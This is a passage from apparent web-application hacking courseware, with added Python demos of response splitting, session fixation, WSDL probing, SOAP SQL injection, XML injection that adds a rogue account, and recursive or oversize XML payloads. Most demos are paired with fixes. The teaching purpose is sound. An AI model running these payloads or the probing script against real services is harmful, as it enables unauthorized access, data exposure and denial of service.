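    A CR/LF pair inside `target` ends the header early, so the attacker can
    append headers and even a complete second response (response splitting)."""
    return (f"HTTP/1.1 302 Found\r\n"
            f"Location: {target}\r\n"
            f"Content-Length: 0\r\n\r\n")


def build_redirect_safe(target):
    """Hardened version: rejects CR, LF and NUL (header injection) and any
    off-site destination (open redirect) before the value reaches a header."""
    if re.search(r"[\r\n\x00]", target):
        raise ValueError("control characters in redirect target")
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("redirect target is not an allowed host")
    return build_redirect_vulnerable(target)   # value is now safe to emit


def split_responses(raw):
    """Split a raw HTTP stream the way a naive client or shared cache would:
    a new response begins wherever a line starts with an HTTP/1.x status line.
    Returns a list of (status_line, {header: value}) tuples."""
    responses = []
    for chunk in re.split(r"(?m)(?=^HTTP/1\.[01] \d{3})", raw):
        if not chunk:
            continue
        head = chunk.split("\r\n\r\n", 1)[0]
        status, *header_lines = head.split("\r\n")
        headers = {}
        for line in header_lines:
            if ":" in line:
                name, value = line.split(":", 1)
                headers[name.strip().lower()] = value.strip()
        responses.append((status, headers))
    return responses


# Constructed attack value for a ?next= style parameter, shown URL-decoded: it
# closes the redirect response and smuggles in a second, attacker-authored
# response carrying a script. Whoever consumes the second response (a shared
# cache, or the browser on its next request over the same connection) runs it.
SPLITTING_PAYLOAD = ("http://juggyboy.com/\r\n"
                     "Content-Length: 0\r\n"
                     "\r\n"
                     "HTTP/1.1 200 OK\r\n"
                     "Content-Type: text/html\r\n"
                     "Content-Length: 25\r\n"
                     "\r\n"
                     "<script>alert(1)</script>")


if __name__ == "__main__":
    for status, headers in split_responses(build_redirect_vulnerable(SPLITTING_PAYLOAD)):
        print(status, headers)
    for value in (SPLITTING_PAYLOAD, "http://evil.example/", "https://juggyboy.com/home"):
        try:
            build_redirect_safe(value)
            print("accepted:", value)
        except ValueError as exc:
            print("rejected:", exc)
```

Modern frameworks refuse raw CR/LF in header values, so today the vulnerable form is mostly found in hand-rolled servers, proxies and CGI-style code; the host allow-list is still needed everywhere, because nothing in the framework stops an open redirect.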
Frame Injection

When scripts do not validate their input, an attacker can inject code through frames: a frame's source or content is set from untrusted input, so attacker-controlled content is rendered inside the trusted page. This affects all browsers and scripts that do not validate untrusted input. These vulnerabilities occur in HTML pages that use frames, and they are made worse by the fact that browsers allow the contents of frames to be modified by script.
Request Forgery Attack

In this attack, the attacker exploits the trust that a website or web application places in the user's browser. The attack works by including, in a page the attacker controls, a link or form that makes the browser send a request to a site to which the user is already authenticated; the browser attaches the user's cookies automatically, so the site performs the requested action as that user.
Session Fixation

Session fixation lets an attacker hijack a valid user session. The attacker first obtains a session ID known to him (for example by visiting the site and taking the ID the server issues), then tricks the user into accessing the genuine web server with that existing session ID value. When the user authenticates, the server keeps the same ID, so the attacker, who already knows it, now holds a user-validated session.
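Added example, not from the page, of the sequence just described as a tiny session store: SessionStore, USERS and fixation_attack are constructed for the illustration (Mark/12345 is the account visible on the page's login screenshot). The only difference between the vulnerable and the fixed server is whether login() issues a fresh session ID, which is exactly the countermeasure that defeats fixation.

```python
import secrets

# Constructed credential store.
USERS = {"Mark": "12345"}


class SessionStore:
    """Server-side session table. With regenerate_on_login=False the server
    keeps whatever session ID the client arrived with once the user logs in,
    which is the fixation weakness; with True it issues a fresh ID at login."""

    def __init__(self, regenerate_on_login):
        self.regenerate_on_login = regenerate_on_login
        self._sessions = {}                      # session id -> session data

    def _new_session(self):
        sid = secrets.token_hex(16)
        self._sessions[sid] = {"user": None}
        return sid

    def session_for(self, cookie_sid):
        """Return the session ID the client should use: the one it presented
        if the server knows it, otherwise a fresh one."""
        if cookie_sid in self._sessions:
            return cookie_sid
        return self._new_session()

    def login(self, sid, username, password):
        """Returns (session id to set in the cookie, success)."""
        if USERS.get(username) != password:
            return sid, False
        if self.regenerate_on_login:
            self._sessions.pop(sid, None)        # discard the pre-auth session
            sid = self._new_session()
        self._sessions[sid]["user"] = username
        return sid, True

    def whoami(self, sid):
        return self._sessions.get(sid, {}).get("user")


def fixation_attack(store):
    """Play the attack through and return the user that the attacker's known
    session ID resolves to after the victim logs in (None: attack failed)."""
    # 1. Attacker obtains a valid, unauthenticated session ID from the server.
    attacker_sid = store.session_for(None)
    # 2. Attacker fixes that ID in the victim's browser (a link carrying the
    #    ID, a cookie set from a sibling subdomain, ...); the victim now sends it.
    victim_sid = store.session_for(attacker_sid)
    assert victim_sid == attacker_sid             # server accepted the fixed ID
    # 3. Victim authenticates while using the fixed ID.
    store.login(victim_sid, "Mark", "12345")
    # 4. Attacker presents the ID he already knows.
    return store.whoami(attacker_sid)


if __name__ == "__main__":
    print("no regeneration:    ", fixation_attack(SessionStore(regenerate_on_login=False)))
    print("regenerate at login:", fixation_attack(SessionStore(regenerate_on_login=True)))
```

When testing a real application, the check is the same as step 3 and 4 above: note the session cookie before login, log in, and see whether the cookie value changed; if it did not, the fixation is exploitable by anyone who can plant a cookie or a URL-carried session ID in the victim's browser.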
Privacy Attacks

A privacy attack is tracking performed by a remote site on the basis of leaked persistent browser state, such as cookies or cache entries that identify the same user across visits.
ActiveX Attacks

The attacker lures the victim via email or a crafted link to a page that invokes a vulnerable ActiveX control, so that the control's remote code execution weaknesses become reachable. Code that runs this way gains the same access privileges as the logged-on user.
(Methodology figure: Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services, Attack Web Servers, Attack Authentication Mechanism)

Web App Hacking Methodology

Attack Web Services
Web services are an easy target for attackers, and serious security breaches follow when an attacker compromises them. The different types of web service attacks and their consequences are explained on the following slides.
Attack Web Services
Web services work atop the legacy web applications, and any attack on a web service immediately exposes the underlying application's business and logic vulnerabilities to further attacks. Web services can be attacked with many techniques because they are made available to users through various mechanisms, which increases the number of possible vulnerabilities; the attacker can exploit those vulnerabilities to compromise the web services. There may be many reasons behind attacking web services, and the attacker chooses the attack according to the purpose: if the intention is to stop a web service from serving its intended users, the attacker can launch a denial-of-service attack by sending numerous requests.

Various types of attacks used against web services are:
- SOAP Injection
- XML Injection
- WSDL Probing Attacks
- Information Leakage
- Application Logic Attacks
- Database Attacks
FIGURE 13.52: Attack Web Services (figure labels around the web service: SOAP Injection, XML Injection; WSDL Probing Attacks; Information Leakage, Application Logic Attacks; Database Attacks, DoS Attacks)
Web Services Probing Attacks

In the first step, the attacker captures the WSDL document from web service traffic and analyzes it to determine the purpose of the application, its functional breakdown, entry points, and message types. The attacker then creates a set of valid requests by selecting a set of operations and formulating the request messages according to the rules of the XML Schema, so that they can be submitted to the web service. Finally, the attacker uses these requests to include malicious content in SOAP requests and analyzes the resulting errors to gain a deeper understanding of potential security weaknesses. These attacks work similarly to SQL injection attacks: in the figure below, a single apostrophe placed in the name field breaks the backend query, and the SOAP fault the server returns leaks the SQL fragment and the full .NET stack trace, revealing the database provider (OLE DB), the shape of the query, and the class and method names of the service.
Attacker injects an arbitrary character (') in the input field:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
    xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
      <SOAPSDK4:name>'</SOAPSDK4:name>
      <SOAPSDK4:uid>312-111-8543</SOAPSDK4:uid>
      <SOAPSDK4:password>5648</SOAPSDK4:password>
    </SOAPSDK4:GetProductInformationByName>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Server throws an error:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Server</faultcode>
      <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to
        process request. ---> System.Data.OleDb.OleDbException: Syntax error (missing
        operator) in query expression 'productname like ''' and providerid = '312-111-8543''.
        at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(Int32 hr)
        at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object& executeResult)
        at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeResult)
        at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeResult)
        at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
        at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
        at System.Data.OleDb.OleDbCommand.ExecuteReader()
        at ProductInfo.ProductDBAccess.GetProductInformation(String productName, String uid, String password)
        at ProductInfo.ProductInfo.GetProductInformationByName(String name, String uid, String password)
        --- End of inner exception stack trace ---</faultstring>
      <detail />
    </soap:Fault>
  </soap:Body>
</soap:Envelope>

FIGURE 13.53: Web Services Probing Attacks
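The three probing steps as an added Python example, not code from the page or from the service it depicts. SAMPLE_WSDL is a constructed minimal WSDL for the GetProductInformationByName operation in the figure, SAMPLE_FAULT is a constructed, abbreviated copy of the fault shown in the figure, and the namespace http://juggyboy/ProductInfo/ is the one the page uses for this service; the function names and the leak heuristics are assumptions. The example enumerates operations and parameters from the WSDL, generates one schema-valid request per parameter with the probe character in it, and grades a response by how much a fault gives away.

```python
import re
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
NS = {"wsdl": "http://schemas.xmlsoap.org/wsdl/",
      "xsd": "http://www.w3.org/2001/XMLSchema",
      "soap": SOAP_ENV}
ET.register_namespace("soap", SOAP_ENV)

# Constructed WSDL fragment: the minimal types/message/portType shape that
# describes the operation in the figure (the real WSDL is not on the page).
SAMPLE_WSDL = """<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
  xmlns:tns="http://juggyboy/ProductInfo/" targetNamespace="http://juggyboy/ProductInfo/">
  <types><xsd:schema targetNamespace="http://juggyboy/ProductInfo/">
    <xsd:element name="GetProductInformationByName"><xsd:complexType><xsd:sequence>
      <xsd:element name="name" type="xsd:string"/>
      <xsd:element name="uid" type="xsd:string"/>
      <xsd:element name="password" type="xsd:string"/>
    </xsd:sequence></xsd:complexType></xsd:element>
  </xsd:schema></types>
  <message name="GetProductInformationByNameSoapIn">
    <part name="parameters" element="tns:GetProductInformationByName"/>
  </message>
  <portType name="ProductInfoSoap">
    <operation name="GetProductInformationByName">
      <input message="tns:GetProductInformationByNameSoapIn"/>
    </operation>
  </portType>
</definitions>"""

# Constructed server response, abbreviated from the fault in the figure.
SAMPLE_FAULT = f"""<soap:Envelope xmlns:soap="{SOAP_ENV}"><soap:Body><soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request.
---&gt; System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression
'productname like ''' and providerid = '312-111-8543''.
   at System.Data.OleDb.OleDbCommand.ExecuteReader()
   at ProductInfo.ProductDBAccess.GetProductInformation(String productName, String uid, String password)</faultstring>
<detail /></soap:Fault></soap:Body></soap:Envelope>"""


def enumerate_operations(wsdl_text):
    """Step 1: map each portType operation to its input parameters
    [(name, xsd type)] by following operation -> message -> part -> element."""
    root = ET.fromstring(wsdl_text)
    ops = {}
    for op in root.iterfind("wsdl:portType/wsdl:operation", NS):
        msg_name = op.find("wsdl:input", NS).get("message").split(":")[-1]
        message = root.find(f"wsdl:message[@name='{msg_name}']", NS)
        elem_name = message.find("wsdl:part", NS).get("element").split(":")[-1]
        schema_elem = root.find(f"wsdl:types/xsd:schema/xsd:element[@name='{elem_name}']", NS)
        ops[op.get("name")] = [(e.get("name"), e.get("type"))
                               for e in schema_elem.findall(".//xsd:sequence/xsd:element", NS)]
    return ops


def build_request(namespace, operation, values):
    """Step 2: a schema-valid SOAP 1.1 request for `operation`."""
    env = ET.Element(f"{{{SOAP_ENV}}}Envelope")
    body = ET.SubElement(env, f"{{{SOAP_ENV}}}Body")
    call = ET.SubElement(body, f"{{{namespace}}}{operation}")
    for name, value in values.items():
        ET.SubElement(call, f"{{{namespace}}}{name}").text = value
    return ET.tostring(env, encoding="unicode")


def probe_requests(ops, namespace, marker="'"):
    """Step 3: yield (operation, parameter, request) with the marker in one
    parameter at a time, so that a fault can be tied to a single input."""
    for operation, params in ops.items():
        for target, _ in params:
            values = {p: (marker if p == target else "x") for p, _ in params}
            yield operation, target, build_request(namespace, operation, values)


def classify_fault(response_text):
    """Grade a response: is it a SOAP fault, and how much does it leak?"""
    root = ET.fromstring(response_text)
    fault = root.find(".//soap:Fault", NS)
    if fault is None:
        return {"fault": False}
    text = fault.findtext("faultstring") or ""
    return {"fault": True,
            "faultcode": fault.findtext("faultcode") or "",
            "db_error": bool(re.search(r"Syntax error|OleDbException|SqlException|ORA-\d{5}", text)),
            "leaks_query": "query expression" in text,
            "stack_frames": len(re.findall(r"\bat [\w.]+\(", text))}


if __name__ == "__main__":
    ops = enumerate_operations(SAMPLE_WSDL)
    for operation, param, request in probe_requests(ops, "http://juggyboy/ProductInfo/"):
        print(f"{operation}.{param}: {request}")
    print(classify_fault(SAMPLE_FAULT))
```

A fault with db_error and stack_frames set is the signal to switch from probing to injection: the stack trace names the provider and the method that builds the query, and the quoted query expression shows where the probe character landed.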
Web Service Attacks: SOAP Injection

Simple Object Access Protocol (SOAP) is a lightweight, simple XML-based protocol designed to exchange structured and typed information on the web. The Envelope element is always the root element of a SOAP message. The attacker injects malicious query strings in the user input fields to bypass the web service's authentication mechanism and access backend databases; because the values in the SOAP body are passed into the backend query unchanged, this attack works similarly to SQL injection attacks. In the figure, the password field carries a SQL fragment that makes the authentication condition always true, and the server returns a product record although no valid password was supplied.
Account Login at http://juggyboy.com/ws/products.asmx
  Username: %
  Password: ' Or 1=1 Or blah =

Request sent by the attacker:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<SOAP-ENV:Envelope xmlns:SOAPSDK1="http://www.w3.org/2001/XMLSchema"
    xmlns:SOAPSDK2="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:SOAPSDK3="http://schemas.xmlsoap.org/soap/encoding/"
    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="http://juggyboy/ProductInfo/">
      <SOAPSDK4:name>%</SOAPSDK4:name>
      <SOAPSDK4:uid>312-111-8543</SOAPSDK4:uid>
      <SOAPSDK4:password>' Or 1=1 Or blah = </SOAPSDK4:password>
    </SOAPSDK4:GetProductInformationByName>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

Server Response:

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <GetProductInformationByNameResponse xmlns="http://juggyboy/ProductInfo/">
      <GetProductInformationByNameResult>
        <productid>25</productid>
        <productName>Painting101</productName>
        <productQuantity>3</productQuantity>
        <productPrice>1500</productPrice>
      </GetProductInformationByNameResult>
    </GetProductInformationByNameResponse>
  </soap:Body>
</soap:Envelope>

FIGURE 13.54: SOAP Injection
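Added example, not the page's own code: the server side of the figure written as a Python function over an in-memory SQLite table, once with the SOAP parameters concatenated into the query (the assumed bug) and once with bound parameters. The table layout and the QUERY string are assumptions; the password fragment differs from the slide only in its tail (''=' instead of blah =), because SQLite rejects an unknown column name where the original backend evidently did not. The point of the contrast is that the request is identical in both cases and only the handler decides whether the fragment is data or SQL.

```python
import sqlite3
import xml.etree.ElementTree as ET

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
SVC_NS = "http://juggyboy/ProductInfo/"


def make_db():
    """Constructed stand-in for the service's database, holding the account
    and the product visible in the figure."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(uid TEXT, password TEXT);
        CREATE TABLE products(productid INTEGER, productname TEXT,
                              productquantity INTEGER, productprice INTEGER,
                              providerid TEXT);
        INSERT INTO users VALUES ('312-111-8543', '5648');
        INSERT INTO products VALUES (25, 'Painting101', 3, 1500, '312-111-8543');
    """)
    return db


def parse_soap_params(envelope):
    """Pull the operation's child elements out of the SOAP body as a dict."""
    root = ET.fromstring(envelope)
    call = root.find(f".//{{{SVC_NS}}}GetProductInformationByName")
    return {child.tag.split("}")[1]: (child.text or "") for child in call}


QUERY = ("SELECT p.productid, p.productname, p.productquantity, p.productprice "
         "FROM products p JOIN users u ON u.uid = p.providerid "
         "WHERE p.productname LIKE {name} AND u.uid = {uid} AND u.password = {pw}")


def lookup_vulnerable(db, params):
    """Assumed server-side bug: SOAP values are concatenated into the SQL."""
    sql = QUERY.format(name=f"'{params['name']}'", uid=f"'{params['uid']}'",
                       pw=f"'{params['password']}'")
    return db.execute(sql).fetchall()


def lookup_safe(db, params):
    """Fixed handler: the same query with bound parameters."""
    sql = QUERY.format(name="?", uid="?", pw="?")
    return db.execute(sql, (params["name"], params["uid"], params["password"])).fetchall()


def soap_request(name, uid, password):
    """Request in the shape of the figure (values are inserted verbatim)."""
    return f"""<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_ENV}">
  <SOAP-ENV:Body>
    <SOAPSDK4:GetProductInformationByName xmlns:SOAPSDK4="{SVC_NS}">
      <SOAPSDK4:name>{name}</SOAPSDK4:name>
      <SOAPSDK4:uid>{uid}</SOAPSDK4:uid>
      <SOAPSDK4:password>{password}</SOAPSDK4:password>
    </SOAPSDK4:GetProductInformationByName>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


# The figure's request: a LIKE wildcard as the name and a SQL fragment as the
# password. The trailing ''=' swallows the closing quote the application
# appends, the job done by "blah = " on the slide.
INJECTED = soap_request("%", "312-111-8543", "' or 1=1 or ''='")
LEGIT = soap_request("Painting101", "312-111-8543", "5648")
WRONG_PW = soap_request("Painting101", "312-111-8543", "guess")


if __name__ == "__main__":
    db = make_db()
    for label, env in (("injected", INJECTED), ("legit", LEGIT), ("wrong pw", WRONG_PW)):
        p = parse_soap_params(env)
        print(f"{label:9} vulnerable={lookup_vulnerable(db, p)} safe={lookup_safe(db, p)}")
```

The same fragment can be sent through any SOAP client; the XML layer offers no protection because an apostrophe is ordinary character data in XML, so validation against the schema (xsd:string) passes and only the query builder can stop it.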
Web Service Attacks: XML Injection

An XML injection attack is the process in which the attacker supplies input values that the application inserts into an XML document or XML query without escaping, so that the values change the structure of the XML rather than just its content. Attackers inject XML data and tags into user input fields to manipulate the XML schema or to populate an XML database with bogus entries. XML injection can be used to bypass authorization, escalate privileges, and generate web services DoS attacks.
Account Login at http://juggyboy.com/ws/login.asmx
  Username: Mark
  Password: 12345
  E-mail:   mark@certifiedhacker.com</mail></user><user><username>Jason</username><password>attack</password><userid>105</userid><mail>jason@juggyboy.com

Server Side Code (the stored user list after the submission):

<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user>
    <username>gandalf</username>
    <password>!c3</password>
    <userid>101</userid>
    <mail>gandalf@middleearth.com</mail>
  </user>
  <user>
    <username>Mark</username>
    <password>12345</password>
    <userid>102</userid>
    <mail>mark@certifiedhacker.com</mail>
  </user>
  (the following user element is created on the server by the injected e-mail value: a new user account)
  <user>
    <username>Jason</username>
    <password>attack</password>
    <userid>105</userid>
    <mail>jason@juggyboy.com</mail>
  </user>
</users>

FIGURE 13.55: XML Injection
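Added example, not from the page: the login service's record builder in Python, vulnerable by string concatenation and fixed by escaping, run against the e-mail value shown in the figure. USERS_XML, the function names and the record layout are constructed for the illustration; the injected value is the one from the figure.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Constructed user store in the shape of the figure's server-side XML.
USERS_XML = ("<users>"
             "<user><username>gandalf</username><password>!c3</password>"
             "<userid>101</userid><mail>gandalf@middleearth.com</mail></user>"
             "</users>")


def add_user_vulnerable(doc, username, password, userid, mail):
    """Builds the new <user> record by string concatenation, so markup inside
    any field becomes part of the document structure."""
    record = (f"<user><username>{username}</username><password>{password}</password>"
              f"<userid>{userid}</userid><mail>{mail}</mail></user>")
    return doc.replace("</users>", record + "</users>")


def add_user_safe(doc, username, password, userid, mail):
    """Escapes every field, so '<', '>' and '&' in input stay character data."""
    record = (f"<user><username>{escape(username)}</username>"
              f"<password>{escape(password)}</password>"
              f"<userid>{escape(str(userid))}</userid>"
              f"<mail>{escape(mail)}</mail></user>")
    return doc.replace("</users>", record + "</users>")


def list_users(doc):
    """What the server believes the user table contains after the update:
    a list of (username, userid, mail) tuples."""
    root = ET.fromstring(doc)
    return [(u.findtext("username"), u.findtext("userid"), u.findtext("mail"))
            for u in root.findall("user")]


# The e-mail value from the figure's login form: it closes the current record
# and opens a second one for a user the attacker controls.
INJECTED_MAIL = ("mark@certifiedhacker.com</mail></user>"
                 "<user><username>Jason</username><password>attack</password>"
                 "<userid>105</userid><mail>jason@juggyboy.com")


if __name__ == "__main__":
    for builder in (add_user_vulnerable, add_user_safe):
        doc = builder(USERS_XML, "Mark", "12345", 102, INJECTED_MAIL)
        print(builder.__name__, list_users(doc))
```

Escaping is the minimum; building the record with an XML API (ET.SubElement and friends) removes the string concatenation altogether, and validating the e-mail field against the shape an address may have would reject the value before it is stored.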
Web Services Parsing Attacks

Parsing attacks exploit vulnerabilities and weaknesses in the processing capabilities of the XML parser to create a denial-of-service condition or to generate logical errors in web service request processing. The attacker does not need a flaw in the application's own code: a well-formed document that is merely very large or very deeply nested is enough to exhaust the parser before the application logic ever runs.

Recursive Payloads

XML can easily nest elements within a single document to express complex relationships, and parsers follow that nesting faithfully. An attacker queries the web service with a grammatically correct SOAP document that contains so many levels of nested elements that the recursive processing of each level exhausts XML parser and CPU resources (and, for recursive-descent parsers, the call stack).

Oversize Payloads

XML is relatively verbose, so potentially large documents must always be taken into consideration when protecting the infrastructure, and programmers should limit the document size the service accepts. Attackers send a payload that is excessively large to consume all system resources, rendering web services inaccessible to other legitimate users.
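Added example, not the page's code, of a gatekeeper for both payload classes above using Python's streaming expat parser: it rejects oversize documents by length before parsing and over-nested ones by counting element depth and aborting at the first element past the limit, so the abusive document is never materialised. The limits, the element names and the envelope helper are assumptions for the demonstration.

```python
import xml.parsers.expat

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"


class PayloadRejected(Exception):
    pass


def check_xml_payload(data, max_bytes=1_000_000, max_depth=64):
    """Gate to run before the real SOAP stack sees the request. Returns
    {"bytes", "max_depth"} for accepted payloads, raises PayloadRejected
    for oversize or over-nested ones."""
    if len(data) > max_bytes:
        raise PayloadRejected(f"{len(data)} bytes exceeds limit of {max_bytes}")
    depth = 0
    deepest = 0

    def start(name, attrs):
        nonlocal depth, deepest
        depth += 1
        deepest = max(deepest, depth)
        if depth > max_depth:
            raise PayloadRejected(f"element nesting exceeds {max_depth}")

    def end(name):
        nonlocal depth
        depth -= 1

    parser = xml.parsers.expat.ParserCreate()
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.Parse(data, True)             # an exception in a handler aborts Parse
    return {"bytes": len(data), "max_depth": deepest}


def envelope(body):
    """Wrap a body fragment in a SOAP 1.1 envelope (bytes)."""
    return (f'<?xml version="1.0"?><soap:Envelope xmlns:soap="{SOAP_ENV}">'
            f"<soap:Body>{body}</soap:Body></soap:Envelope>").encode()


def recursive_payload(levels):
    """Constructed recursive payload: well-formed nesting `levels` deep inside
    an otherwise normal envelope."""
    opening = "".join(f"<n{i}>" for i in range(levels))
    closing = "".join(f"</n{i}>" for i in reversed(range(levels)))
    return envelope(opening + closing)


def oversize_payload(size):
    """Constructed oversize payload: one element carrying `size` bytes of text."""
    return envelope(f"<data>{'A' * size}</data>")


# A normal request of the kind the service expects (constructed).
NORMAL = envelope("<GetProductInformationByName><name>Painting101</name>"
                  "</GetProductInformationByName>")


if __name__ == "__main__":
    print("normal:", check_xml_payload(NORMAL))
    for label, payload in (("recursive", recursive_payload(5000)),
                           ("oversize", oversize_payload(5_000_000))):
        try:
            check_xml_payload(payload)
        except PayloadRejected as exc:
            print(f"{label}: rejected ({exc})")
```

The same gate is the place to bound attribute counts and entity expansion, which this example does not cover; on Python the defusedxml package bundles those limits. Whatever the limits are, apply them at the edge (reverse proxy or the first handler), because a parser that has already built a multi-gigabyte tree has already done the attacker's work.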
Web Service Attack Tool: soapUI

Source: http://www.soapui.org

soapUI is an open source functional testing tool, mainly used for web service testing. It supports multiple protocols such as SOAP, REST, HTTP, JMS, AMF, and JDBC. It enables you to create advanced performance tests very quickly and to run automated functional tests. With the help of this tool, attackers can easily perform web services probing, SOAP injection, XML injection, and web services parsing attacks.
FIGURE 13.56: soapUI Tool Screenshot (project sample-service with SampleServiceSoapBinding; the WSDL Content view lists the buyRequest, buyResponse, login_faultMsg and logout_faultMsg messages; the Request Properties pane shows the request's endpoint, encoding, authentication and WS-Security settings)
Web Service Attack Tool: XMLSpy

Source: http://www.altova.com

Altova XMLSpy is an XML editor and development environment for modeling, editing, transforming, and debugging XML-related technologies. It offers a graphical schema designer, Smart Fix validation, a code generator, file converters, debuggers, profilers, full database integration, and support for WSDL, SOAP, XSLT, XPath, XQuery, XBRL, and Open XML documents, plus Visual Studio and Eclipse plug-ins, and more.
[Screenshot: Altova XMLSpy XSLT debugger stepping through TheAgencyR3.xslt (an xsl:for-each over n1:FirstName), with the Result Document, Call Stack, Templates, Info, Messages, Trace, Context Variables and XPath-Watch panels]
FIGURE 13.57: XMLSpy Tool Screenshot
Module Flow

So far, we have discussed web application concepts, threats associated with web applications, and the hacking methodology. Now we will discuss hacking tools. These tools help attackers retrieve sensitive information and also craft and send malicious packets or requests to the victim. Web application hacking tools are specially designed for identifying the vulnerabilities in the web application. With the help of these tools, the attacker can easily exploit the identified vulnerabilities and carry out web application attacks.

[Module flow diagram: Web App Concepts, Web App Threats, Hacking Methodology, Web Application Hacking Tools (current section), Countermeasures, Security Tools, Web App Pen Testing]
This section lists and describes various web application hacking tools such as Burp Suite Professional, CookieDigger, WebScarab, and so on.
Web Application Hacking Tool: Burp Suite Professional

Source: http://www.portswigger.net

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work together to support the entire testing process, from initial mapping and analysis of an application's attack surface through to finding and exploiting security vulnerabilities. Burp Suite contains key components such as an intercepting proxy, an application-aware spider, an advanced web application scanner, and the Intruder, Repeater, and Sequencer tools.
[Screenshot: Burp Suite (free edition v1.4.01) Intruder window showing a sniper attack with two payload positions, the target/positions/payloads/options sub-tabs, the results table (request, position, payload, status, error, timeout, length, comment) and the raw request/response viewer]
FIGURE 13.58: Burp Suite Professional Tool Screenshot
Web Application Hacking Tool: CookieDigger

• CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications
• It works by collecting and analyzing cookies issued by a web application for multiple users
• The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values

[Slide screenshot: Foundstone CookieDigger window listing captured POST data and visited URLs]
Source: http://www.mcafee.com

CookieDigger is a tool that detects vulnerable cookie generation and the insecure implementation of session management by web applications. It works by collecting and evaluating the cookies that a web application issues to many users. The tool relies on the predictability and entropy of the cookie, and it checks whether the cookie values contain valuable information such as the user's login details (user name and password).
[Screenshot: Foundstone CookieDigger showing the captured POST data (f_sourceret, f_id and f_pwd fields), the list of visited URLs, the User ID and Password fields, and the Back/Next buttons]
FIGURE 13.59: CookieDigger Tool Screenshot
Web Application Hacking Tool: WebScarab

• WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols
• It allows the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser

[Slide screenshot: WebScarab Summary tab with the tree of conversations for http://www.owasp.org:80/ (banners/, images/, index.php/Main_Page, skins/) and the conversation list showing ID, date, method, host, path, status and origin (Proxy)]
Source: http://www.owasp.org

WebScarab is a framework for analyzing applications that communicate using the HTTP and HTTPS protocols. It is written in Java, and is thus portable to many platforms. WebScarab has several modes of operation, implemented by a number of plugins. It operates as an intercepting proxy, allowing the attacker to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. It is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.
[Screenshot: WebScarab main window (Summary, Message log, Proxy, Manual Request, WebServices, Spider, Extensions, SessionID Analysis, Scripted, Fragments, Fuzzer, Compare tabs) showing the URL tree for http://www.owasp.org:80/ and five proxied conversations dated 2006/06/23: GET requests for /, /index.php/Main_Page, /skins/common/commo..., /skins/common/IEFixes... and /skins/monobook/main..., returning 301 Moved and 200 OK]
FIGURE 13.60: WebScarab Tool Screenshot
Web Application Hacking Tools

A few more tools that can be used for hacking web applications are listed as follows:

• Instant Source available at http://www.blazingtools.com
• w3af available at http://w3af.sourceforge.net
• GNU Wget available at http://gnuwin32.sourceforge.net
• BlackWidow available at http://softbytelabs.com
• cURL available at http://curl.haxx.se
• HttpBee available at http://www.o0o.nu
• Teleport Pro available at http://www.tenmax.com
• WebCopier available at http://www.maximumsoft.com
• HTTrack available at http://www.httrack.com
• MileSCAN ParosPro available at http://www.milescan.com
Module Flow

So far, we have discussed various concepts such as threats associated with web applications, the hacking methodology, and hacking tools. All these topics describe how the attacker breaks into a web application or a website. Now we will discuss web application countermeasures. Countermeasures are the practice of using multiple security systems or technologies to prevent intrusions. They are the key components for protecting and safeguarding the web application against web application attacks.

